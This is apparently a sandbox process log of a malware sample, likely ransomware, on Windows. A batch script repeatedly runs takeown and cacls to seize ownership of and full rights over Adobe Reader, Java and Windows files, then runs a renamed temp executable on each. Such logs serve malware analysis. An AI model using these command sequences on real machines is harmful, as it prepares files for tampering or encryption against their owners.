C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:1992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "zy______.pfm" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "zy______.pfm" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "brt.fca" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "brt.fca" -nobanner4⤵PID:780
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "eng.hyp" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "eng.hyp" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:1084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:1864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "classes.jsa" -nobanner3⤵PID:1072
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "classes.jsa" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "wabmig.exe" -nobanner3⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:1876
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "pmd.cer" -nobanner3⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "pmd.cer" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵PID:780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "pdf.gif" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "pdf.gif" -nobanner4⤵PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:1256
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:1852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "server_issue.gif" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:556
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "zx______.pfm" -nobanner3⤵PID:1072
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "zx______.pfm" -nobanner4⤵PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵
- Modifies file permissions
PID:1228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "can32.clx" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "can32.clx" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "symbol.txt" -nobanner3⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "symbol.txt" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵
- Modifies file permissions
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵PID:1852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵PID:1992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:1756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵
- Modifies file permissions
PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "bl.gif" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "bl.gif" -nobanner4⤵PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:1284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "forms_super.gif" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "review_browser.gif" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "review_browser.gif" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:1380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵
- Modifies file permissions
PID:1692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "tl.gif" -nobanner3⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "tl.gif" -nobanner4⤵PID:396
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Identity-V" -nobanner3⤵PID:780
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Identity-V" -nobanner4⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:432
-
-
